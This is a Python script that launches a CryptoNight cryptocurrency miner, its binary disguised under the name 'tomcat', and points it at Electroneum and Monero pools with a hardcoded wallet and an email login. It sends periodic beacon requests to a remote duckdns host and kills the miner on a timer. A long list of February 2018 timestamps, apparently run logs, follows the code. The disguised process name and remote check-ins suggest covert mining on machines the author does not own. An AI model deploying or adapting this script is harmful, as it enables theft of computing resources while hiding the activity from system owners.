import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:42:07.423912
#2018-02-17 17:31:05.462171
#2018-02-17 19:19:06.077077
#2018-02-17 21:08:06.377612
#2018-02-17 22:52:06.390229
#2018-02-18 00:37:05.140681
#2018-02-18 02:27:07.462082
#2018-02-18 04:14:04.912255
#2018-02-18 06:04:04.134401
#2018-02-18 07:53:01.789095
#2018-02-18 09:40:07.541214
#2018-02-18 11:26:01.464764
#2018-02-18 13:12:05.672534
#2018-02-18 15:01:07.415749
#2018-02-18 16:49:05.339265
#2018-02-18 18:37:05.148293
#2018-02-18 20:25:05.606932
#2018-02-18 22:11:04.934028
#2018-02-18 23:58:04.088801
#2018-02-19 01:45:01.518467
#2018-02-19 03:32:07.473873
#2018-02-19 05:17:05.829890
#2018-02-19 07:05:04.129176
#2018-02-19 08:53:06.614121
#2018-02-19 10:42:04.429824
#2018-02-19 12:29:06.719755
#2018-02-19 14:17:06.066333
#2018-02-19 16:06:04.939993
#2018-02-19 17:53:07.002275
#2018-02-19 19:39:01.890225
#2018-02-19 21:26:06.597718
#2018-02-19 23:13:05.464414
#2018-02-20 00:58:05.867882
#2018-02-20 02:48:06.236932
#2018-02-20 04:36:06.472755
#2018-02-20 06:20:07.588621
#2018-02-20 08:05:06.953630
#2018-02-20 09:51:04.372205
#2018-02-20 11:34:08.506654
#2018-02-20 13:22:08.350028
#2018-02-20 15:55:15.330788
#2018-02-20 17:41:05.647136
#2018-02-20 19:29:06.909584
#2018-02-20 21:18:04.290443
#2018-02-20 23:02:01.475994
#2018-02-21 00:46:06.870094
#2018-02-21 02:32:03.986850
#2018-02-21 04:19:06.472304
#2018-02-21 06:07:06.366544
#2018-02-21 07:54:04.774481
#2018-02-21 09:39:04.067033
#2018-02-21 11:28:06.144093
#2018-02-21 13:17:02.179916
#2018-02-21 15:02:07.440194
#2018-02-21 16:52:01.716927
#2018-02-21 18:42:10.874581
#2018-02-21 20:27:04.050226
#2018-02-21 22:15:08.710751
#2018-02-22 00:06:02.058632
#2018-02-22 01:52:08.291270
#2018-02-22 03:39:07.382266
#2018-02-22 05:26:06.012474
#2018-02-22 07:11:05.247820
#2018-02-22 08:57:07.882630
#2018-02-22 10:45:10.356643
#2018-02-22 12:31:01.844850
#2018-02-22 14:15:12.302847
#2018-02-22 16:03:10.161477
#2018-02-22 17:48:01.690728
#2018-02-22 19:34:07.079995
#2018-02-22 21:26:07.490554
#2018-02-22 23:13:02.186903
#2018-02-23 00:58:01.415839
#2018-02-23 02:47:01.794311
#2018-02-23 04:37:01.923089
#2018-02-23 06:23:03.511718
#2018-02-23 08:11:07.783931
#2018-02-23 10:23:01.670605
#2018-02-23 12:16:04.183730
#2018-02-23 14:06:07.981633
#2018-02-23 15:56:09.755611
#2018-02-23 17:42:05.296046
#2018-02-23 19:29:08.534428
#2018-02-23 21:13:07.454356
#2018-02-23 22:58:05.668926
#2018-02-24 00:46:04.887695
#2018-02-24 02:40:04.147637
#2018-02-24 04:34:06.028468
#2018-02-24 06:19:06.040453
#2018-02-24 08:07:06.110155
#2018-02-24 09:51:07.791212
#2018-02-24 11:46:03.344730
#2018-02-24 13:37:02.428956
#2018-02-24 15:24:03.576654
#2018-02-24 17:13:04.436664
#2018-02-24 19:04:05.663431
#2018-02-24 20:52:06.323795
#2018-02-25 01:17:05.213986
#2018-02-25 05:14:07.071621
#2018-02-25 11:12:01.352902